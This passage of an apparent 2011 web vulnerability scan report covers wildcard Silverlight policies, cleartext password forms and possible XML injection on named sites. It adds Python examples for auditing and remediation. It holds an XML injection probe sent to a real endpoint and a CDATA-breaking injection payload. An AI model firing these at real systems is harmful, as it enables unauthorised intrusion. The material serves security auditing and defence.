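<grant-to><resource path="/" include-subpaths="true" /></grant-to>
</policy></cross-domain-access></access-policy>"""

# Invented tight policy for contrast: named origins (from 5.7), one sub-path, no header wildcard.
SILVERLIGHT_TIGHT = b"""<access-policy><cross-domain-access><policy>
<allow-from><domain uri="http://www.microsoft.com"/><domain uri="http://i.microsoft.com"/></allow-from>
<grant-to><resource path="/public/" include-subpaths="true" /></grant-to>
</policy></cross-domain-access></access-policy>"""

if __name__ == "__main__":
    for name, policy in [("apple", FLASH_APPLE), ("disqus", FLASH_DISQUS),
                         ("doubleclick", SILVERLIGHT_OPEN), ("tight", SILVERLIGHT_TIGHT)]:
        findings = audit(policy)
        print(f"{name}: worst={worst(findings)}")
        for f in findings:
            print(f"  [{f.severity}] {f.message}")
```

Run it as a script to print one line per finding, or pass the body of a fetched policy file to audit() to check a live host. An "info" rating means only that the entry names a single host; whether that host deserves two-way access is still the judgement the remediation text asks for.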


5.1. http://ad.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 20:54:04 GMT
Date: Thu, 21 Jul 2011 16:13:59 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.2. http://clk.atdmt.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: clk.atdmt.com

Response

HTTP/1.1 200 OK
Content-Length: 312
Content-Type: text/xml
Date: Thu, 21 Jul 2011 17:36:10 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.3. http://haymarketbusinesspublications.122.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://haymarketbusinesspublications.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain. The policy additionally sets http-request-headers="*" and grants path="/" with include-subpaths="true", so a Silverlight client on any origin can send requests with arbitrary headers to every path on the host.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: haymarketbusinesspublications.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:14:05 GMT
Server: Omniture DC/2.0.0
xserver: www333
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.4. http://metrics.apple.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.apple.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.apple.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 20:25:07 GMT
Server: Omniture DC/2.0.0
xserver: www647
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.5. http://rad.msn.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain, and sets http-request-headers="*" so callers may add arbitrary request headers. The response also carries Access-Control-Allow-Origin: *, which opens the same resource to cross-origin XMLHttpRequest; that header is the lesser concern, because browsers refuse to send cookies with a wildcard CORS origin, whereas a Silverlight client using the browser HTTP stack sends whatever cookies the user holds for rad.msn.com.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: rad.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/xml
Last-Modified: Fri, 13 May 2011 05:32:00 GMT
Accept-Ranges: bytes
ETag: "088fa142f11cc1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Thu, 21 Jul 2011 20:05:09 GMT
Connection: keep-alive
Content-Length: 337

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<gran
...[SNIP]...

5.6. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Jul 2011 16:12:55 GMT
Content-Type: text/xml
Content-Length: 255
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
Connection: close
Expires: Thu, 28 Jul 2011 16:12:55 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

5.7. http://i.microsoft.com/clientaccesspolicy.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.microsoft.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: i.microsoft.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 12 May 2009 23:10:10 GMT
ETag: "c4640cc56d3c91:0"
Server: Microsoft-IIS/7.5
VTag: 279350742100000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Cache-Control: max-age=900
Date: Thu, 21 Jul 2011 20:05:06 GMT
Content-Length: 572
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from >
<domain uri="http://www.microsoft.com"/>
<domain uri="http://i.mic
...[SNIP]...
<domain uri="http://i2.microsoft.com"/>
<domain uri="http://i3.microsoft.com"/>
<domain uri="http://i4.microsoft.com"/>
   <domain uri="http://img.microsoft.com"/>
...[SNIP]...

5.8. http://i3.microsoft.com/clientaccesspolicy.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i3.microsoft.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: i3.microsoft.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 12 May 2009 23:10:10 GMT
ETag: "c4640cc56d3c91:0"
Server: Microsoft-IIS/7.5
VTag: 279350742100000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Cache-Control: max-age=885
Date: Thu, 21 Jul 2011 20:05:21 GMT
Content-Length: 572
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from >
<domain uri="http://www.microsoft.com"/>
<domain uri="http://i.microsoft.com"/>
<domain uri="http://i2.microsoft.com"/>
...[SNIP]...
<domain uri="http://i4.microsoft.com"/>
   <domain uri="http://img.microsoft.com"/>
...[SNIP]...

5.9. http://www.microsoft.com/clientaccesspolicy.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microsoft.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.microsoft.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Type: text/xml
Last-Modified: Tue, 12 May 2009 23:10:10 GMT
Accept-Ranges: bytes
ETag: "c4640cc56d3c91:0"
Server: Microsoft-IIS/7.5
VTag: 2796742500000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Thu, 21 Jul 2011 17:35:16 GMT
Connection: keep-alive
Content-Length: 572

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from >
<domain uri="http://www.microsoft.com"/>
<domain uri="http://i.microsoft.com"/>
<domain uri="http://i2.microsoft.com"/>
<domain uri="http://i3.microsoft.com"/>
<domain uri="http://i4.microsoft.com"/>
   <domain uri="http://img.microsoft.com"/>
...[SNIP]...

6. Cleartext submission of password
There are 5 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques such as ARP spoofing can be used to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
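Burp reports this issue per form, and 6.1 to 6.5 show the cases that need a human decision: a relative action that resolves to http://, an action assembled in script, and a form with no action whose onsubmit returns false. The following is an added example, not part of the report or of any listed site's code: it parses a page with Python's html.parser, resolves each password form's action against the page URL and labels it. The sample page and its URL are constructed, modelled on the vBulletin login form from 6.2 and the lgForm from 6.5; the https:// form and the search form are invented for contrast.

```python
"""Find forms that would submit a password over clear-text HTTP (added example)."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormCollector(HTMLParser):
    """Collect every <form> together with the names of the password inputs inside it."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"attrs": attrs, "passwords": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._current["passwords"].append(attrs.get("name") or attrs.get("id") or "?")

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def classify_form(page_url, form):
    """Return (verdict, target) for one form.

    cleartext      action resolves to http://
    encrypted      action resolves to https:// (an http:// page can still be rewritten
                   in transit, so the page itself should move to TLS as well)
    dynamic        action is built by script, e.g. '+MyYearbook.URLs.ssl+' as in 6.1/6.4
    script-driven  no action, or onsubmit returns false, as in 6.5; inspect the script
    """
    attrs = form["attrs"]
    action = attrs.get("action")
    onsubmit = (attrs.get("onsubmit") or "").replace(" ", "").lower()
    if action is not None and ("'+" in action or "+'" in action):
        return "dynamic", action
    if action is None or "returnfalse" in onsubmit:
        return "script-driven", None
    target = urljoin(page_url, action)  # resolves relative and protocol-relative actions
    return ("encrypted" if urlsplit(target).scheme == "https" else "cleartext"), target


def find_password_forms(page_url, html):
    """Every form on the page that contains a password field, with a verdict each."""
    collector = _FormCollector()
    collector.feed(html)
    results = []
    for form in collector.forms:
        if not form["passwords"]:
            continue
        verdict, target = classify_form(page_url, form)
        results.append({"form": form["attrs"].get("id"), "fields": form["passwords"],
                        "verdict": verdict, "target": target})
    return results


# Constructed sample page, modelled on the forms in 6.2 and 6.5; the last two forms are invented.
SAMPLE_PAGE_URL = "http://forums.vostu.com/"
SAMPLE_HTML = """
<form method="post" id="signin" action="login.php?do=login"
      onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
  <input type="text" name="vb_login_username" />
  <input id="navbar_password" type="password" name="vb_login_password" />
</form>
<form id="lgForm" onsubmit="return false">
  <input type="password" name="pass" id="pass" />
</form>
<form id="secure" method="post" action="https://forums.vostu.com/login">
  <input type="password" name="password" />
</form>
<form id="search" action="/search"><input type="text" name="q"></form>
"""

if __name__ == "__main__":
    for result in find_password_forms(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print(f"{result['form']:<10} {result['verdict']:<14} fields={result['fields']} target={result['target']}")
```

A client-side hash in onsubmit (the md5hash() call in 6.2 and 6.3) does not change the verdict: whatever the server accepts is the credential, and it still crosses the wire unencrypted. Forms labelled dynamic or script-driven need the live page inspected, since the static markup does not say where the credential goes.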


6.1. http://assets.0.mybcdna.com/JavaScript/apps/HomeBeforeLogin/hblv2.js

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.0.mybcdna.com
Path:   /JavaScript/apps/HomeBeforeLogin/hblv2.js

Issue detail

The JavaScript file builds a login form (id="login_form") containing a password field (name="password"). The form's action is assembled at runtime from MyYearbook.URLs.ssl followed by "login" (see the response excerpt below); the scanner could not resolve that expression and rated the submission as clear-text HTTP. If MyYearbook.URLs.ssl resolves to an https:// prefix, the credential is protected in transit and this instance is a false positive; confirm the value in a live page. Note that the script itself is delivered over clear-text HTTP, so a network attacker could still rewrite the form target before it is rendered.

Request

GET /JavaScript/apps/HomeBeforeLogin/hblv2.js?68769 HTTP/1.1
Host: assets.0.mybcdna.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Last-Modified: Thu, 16 Jun 2011 15:10:15 GMT
ETag: "2230425394"
Content-Type: text/javascript
Accept-Ranges: bytes
Content-Length: 274737
Date: Thu, 21 Jul 2011 17:58:28 GMT
Server: lighttpd/1.4.19
X-MyPoolMember: 10.10.10.240
Cache-Control: private, max-age=1800
Age: 0
Expires: Thu, 21 Jul 2011 18:28:28 GMT
X-CDN: Cotendo
Connection: Keep-Alive

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
</h4>';content+='<form method="post" id="login_form" action="'+MyYearbook.URLs.ssl+'login">';content+='<div class="login_fields">
...[SNIP]...
<dd><input type="password" class="text" name="password"/> </dd>
...[SNIP]...

6.2. http://forums.vostu.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.vostu.com
Path:   /

Issue detail

The page contains a form (id="signin") whose action, login.php?do=login, resolves to http://forums.vostu.com/login.php?do=login and is therefore submitted over clear-text HTTP. The form contains the password field vb_login_password. The onsubmit handler (md5hash(...)) hashes the password in the browser before submission; this does not mitigate the issue, because the hash is the value the server accepts and can be captured and replayed just as the plaintext could.

Request

GET / HTTP/1.1
Host: forums.vostu.com
Proxy-Connection: keep-alive
Referer: http://www.vostu.com/en/2011/04/20/megacity-takes-brazil-by-storm/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=32124601.79039334.1311275451.1311275451.1311275451.1; __utmb=32124601.9.7.1311275636343; __utmc=32124601; __utmz=32124601.1311275451.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:13:49 GMT
Server: Apache/2.2.14 (Unix) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.14
Cache-Control: private
Pragma: private
Set-Cookie: Az_lastvisit=1311275629; expires=Fri, 20-Jul-2012 19:13:49 GMT; path=/
Set-Cookie: Az_lastactivity=0; expires=Fri, 20-Jul-2012 19:13:49 GMT; path=/
Set-Cookie: Az_languageid=2; expires=Fri, 20-Jul-2012 19:13:49 GMT; path=/
Set-Cookie: Az_userstyleid=8; expires=Fri, 20-Jul-2012 19:13:49 GMT; path=/
Content-Length: 88918
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="pt-BR" id="vbullet
...[SNIP]...
<fieldset id="signin_menu">
<form method="post" id="signin" action="login.php?do=login" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
<label for="username">
...[SNIP]...
</label>

<input id="navbar_password" type="password" value="" tabindex="102" accesskey="u" name="vb_login_password" />

</p>
...[SNIP]...

6.3. http://forums.vostu.com/forums/41-Como-Jogar

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.vostu.com
Path:   /forums/41-Como-Jogar

Issue detail

The page contains a form (id="navbar_loginform") whose action, login.php?do=login, resolves to http://forums.vostu.com/login.php?do=login and is therefore submitted over clear-text HTTP. The form contains the password field vb_login_password. As in 6.2, the client-side md5hash() call in the onsubmit handler does not protect the credential: whatever value the server accepts is what a network attacker captures.

Request

GET /forums/41-Como-Jogar HTTP/1.1
Host: forums.vostu.com
Proxy-Connection: keep-alive
Referer: http://forums.vostu.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=32124601.79039334.1311275451.1311275451.1311275451.1; __utmb=32124601.12.4.1311275636343; __utmc=32124601; __utmz=32124601.1311275451.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Az_lastvisit=1311275630; Az_lastactivity=0; Az_userstyleid=8; Az_languageid=2

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:14:19 GMT
Server: Apache/2.2.14 (Unix) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.14
Cache-Control: private
Pragma: private
Set-Cookie: Az_lastactivity=0; expires=Fri, 20-Jul-2012 19:14:19 GMT; path=/
Set-Cookie: Az_forum_view=7139c26eb82c8e78808f0b999029d51072882d5ca-1-%7Bi-41_i-1311275659_%7D; path=/
Content-Length: 66284
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="pt-BR" id="vbullet
...[SNIP]...
</script>
           <form id="navbar_loginform" action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
               <fieldset id="logindetails" class="logindetails">
...[SNIP]...
<input type="text" class="textbox default-value" tabindex="102" name="vb_login_password_hint" id="navbar_password_hint" size="10" value="Senha" style="display:none;" />
                   <input type="password" class="textbox" tabindex="102" name="vb_login_password" id="navbar_password" size="10" />
                   <input type="submit" class="loginbutton" tabindex="104" value="Conectar" title="Enter your username and password in the boxes provided to login, or click the 'register' button to create a profil
...[SNIP]...

6.4. http://static.curse.com/themes/common/v6/scripts/core.js

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.curse.com
Path:   /themes/common/v6/scripts/core.js

Issue detail

The script emits a form containing a password field (name="password", id="id_password"). The form's action is the JavaScript variable url, concatenated at runtime, so its scheme cannot be determined from the static response; the scanner therefore rated it as clear-text. Confirm the resolved action in a live page: if it is http://, the password is submitted in clear text, and in either case the script that builds the form is itself delivered over clear-text HTTP.

Request

GET /themes/common/v6/scripts/core.js?LastChanged=634456582020000000 HTTP/1.1
Host: static.curse.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60480000
Content-Type: application/x-javascript
Last-Modified: Tue, 17 May 2011 16:36:49 GMT
Accept-Ranges: bytes
ETag: "80e6539eb014cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 04:48:22 GMT
Content-Length: 324214

/* D:\Projects\Curse\trunk\Curse.com\source\Curse.Build\..\Curse.Web\Themes\Common\v6\scripts\core\100-jquery.js */

(function(){var
window=this,undefined,_jQuery=window.jQuery,_$=window.$,jQuery=wind
...[SNIP]...
</p><form method="post" action="'+url+'"><input name="next" value="'+window.location.href+'" type="hidden" />
...[SNIP]...
</label> <input id="id_password" name="password" maxlength="30" type="password"></div>
...[SNIP]...

6.5. http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.boston.com
Path:   /lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/

Issue detail

The page contains a form (id="lgForm") with a password field (name="pass"). The form has no action attribute and its onsubmit handler returns false, so submission is handled by script rather than by a browser form post; the report does not show the endpoint the script sends the credential to. Because the page itself is served over clear-text HTTP, inspect the login script and confirm whether the credential leaves the browser over https://.

Request

GET /lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links HTTP/1.1
Host: www.boston.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW804GIB4AATB3; s_vi=[CS]v1|2703101A8516139C-400001A3C00CA954[CE]; anonId=c78dd2a2-2fd6-478d-a9a0-c99ad34539e3; RMFD=011QgHGVO1060Oe; __unam=b6206f2-130c7ed914a-12883c53-4; bcpage=5; _chartbeat2=2gl4d8yk23g2sl2m

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:48:28 GMT
Server: Apache/2.2.17 (Linux/SUSE) PHP/5.3.5
X-Powered-By: PHP/5.3.5
Set-Cookie: bcpage=0;expires=Sun, 26-Jun-2016 13:48:13 GMT;path=/;domain=boston.com;
Accept-Ranges: bytes
Served-By: tjanefer
Content-Type: text/html
Set-Cookie: bcpage=7;expires=Sun, 26-Jun-2016 13:48:14 GMT;path=/;domain=boston.com;
Content-Length: 49839
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>


<title>Facebook, Twitter obligations persist during vacations - The
...[SNIP]...
</div>
<form id="lgForm" onsubmit="return false">
<table cellspacing="0" style="margin: 5px; width: 98%;height:200px" id="logtable">
...[SNIP]...
<td><input type="password" style="" maxlength="50" name="pass" id="pass" /></td>
...[SNIP]...

7. XML injection
There are 2 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. Rejecting input that contains XML metacharacters such as <, > and & is one option; otherwise these characters must be replaced with the corresponding entities (&lt;, &gt; and &amp;, plus &quot; and &apos; inside attribute values). Note that the sequence ]]> is not permitted in element content and is what terminates a CDATA section, which is why the scanner uses it as a probe. The most robust approach is to build the document with an XML library that sets element text and attribute values through its API, rather than by string concatenation.
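To make the remediation concrete, here is the vulnerable pattern beside two fixes, as an added example that is not from the report or from the scmagazineus.com code (the <resize> request format and its fields are invented for illustration; only the ]]>> probe is the one the scanner used in 7.1 and 7.2). parse_request() reads each document back the way a server-side XML parser would, so the effect of each payload shows up in the returned values.

```python
"""XML injection: user input pasted into XML text versus set through an XML API
(added example; the resize request format is invented for illustration)."""
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape


def build_request_unsafe(image, h, w):
    """The vulnerable pattern: string concatenation, with CDATA used as a 'quote'."""
    return f"<resize><image><![CDATA[{image}]]></image><h>{h}</h><w>{w}</w></resize>"


def build_request_escaped(image, h, w):
    """Minimal fix for string-built XML: entity-encode &, < and > in every value."""
    return (f"<resize><image>{escape(str(image))}</image>"
            f"<h>{escape(str(h))}</h><w>{escape(str(w))}</w></resize>")


def build_request_safe(image, h, w):
    """Preferred fix: let the XML library own the structure; text is escaped on output."""
    root = ET.Element("resize")
    ET.SubElement(root, "image").text = str(image)
    ET.SubElement(root, "h").text = str(h)
    ET.SubElement(root, "w").text = str(w)
    return ET.tostring(root, encoding="unicode")


def parse_request(xml_text):
    """Read the request back as a server would: (image, h, w), or None if the
    document is not well-formed, which is the parser error a scanner probes for."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return None
    return root.findtext("image"), root.findtext("h"), root.findtext("w")


# The report's probe: "]]>>" appended to a numeric parameter. "]]>" is illegal in
# element content, so the string-built document stops parsing.
PROBE = "244]]>>"
# A structural payload: close the CDATA section and the element, insert a new <h>,
# then reopen <image><![CDATA[ so the document stays well-formed.
INJECT = "x]]></image><h>9999</h><image><![CDATA["

if __name__ == "__main__":
    print("probe, unsafe :", parse_request(build_request_unsafe("pic.jpg", PROBE, 436)))
    print("probe, safe   :", parse_request(build_request_safe("pic.jpg", PROBE, 436)))
    print("inject, unsafe:", parse_request(build_request_unsafe(INJECT, 244, 436)))
    print("inject, safe  :", parse_request(build_request_safe(INJECT, 244, 436)))
```

The probe only proves that input reached a parser unescaped when the response visibly changes; a well-formed document that nevertheless contains an attacker-chosen <h> is the more damaging outcome, which the INJECT payload shows against the string-built version and neither fix allows.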


7.1. http://www.scmagazineus.com/webservice/ImageResizer.ashx [h parameter]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.scmagazineus.com
Path:   /webservice/ImageResizer.ashx

Issue detail

The h parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the h parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation. Note, however, that the response is a 141,832-byte JPEG (Content-Type: image/Jpeg) carrying an Adobe header, and the <?xml version="1.0" encoding="UTF-8"?> string the scanner matched sits inside that image, where Adobe tools embed XMP metadata as XML; the response to the w-parameter probe in 7.2 has the identical length. This points to a match on embedded image metadata rather than a parser error, so treat the finding as unconfirmed unless the resizer's output differs for a payload versus a clean value.

Request

GET /webservice/ImageResizer.ashx?n=http://media.scmagazineus.com/images/2011/07/01/0711_soc_177911_177914.jpg&h=244]]>>&w=436&c=1 HTTP/1.1
Host: www.scmagazineus.com
